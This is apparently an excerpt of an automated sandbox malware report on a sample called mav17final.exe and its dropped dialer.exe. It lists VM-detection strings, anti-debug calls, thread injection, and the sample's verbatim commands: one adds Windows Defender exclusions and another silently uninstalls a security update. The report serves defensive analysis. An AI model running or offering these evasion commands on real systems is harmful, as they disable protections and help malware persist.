      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
      Source: mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ]\utsrqponmlkjihgfSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exep
      Source: C:\Windows\System32\dwm.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\Desktop\mav17final.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA565B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA565B4
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9071270 LoadLibraryA,GetProcAddress,FreeLibrary,2_2_00007FF8B9071270
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5EE60 GetProcessHeap,0_2_00007FF79EA5EE60
      Source: C:\Users\user\Desktop\mav17final.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA565B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA565B4
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4C690 SetUnhandledExceptionFilter,0_2_00007FF79EA4C690
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4BC10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79EA4BC10
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4C4AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79EA4C4AC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B907A000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B907A000
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B907A928 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B907A928
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90A35E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B90A35E0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90A3BB0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B90A3BB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90CA090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B90CA090
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90CAAD8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B90CAAD8
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C2600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B93C2600
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C2BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B93C2BC0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9841B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B9841B00
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9841530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B9841530
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9F66254 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8B9F66254
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9F65CB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8B9F65CB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BA250468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8BA250468
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8BFAB52F0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8BFAB4D20
      Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Modifies the context of a thread in another process (thread injection)
      Source: C:\ProgramData\dialer.exeThread register set: target process: 5952
      Source: C:\ProgramData\dialer.exeThread register set: target process: 2804
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA64EF0 cpuid 0_2_00007FF79EA64EF0
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dialer.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
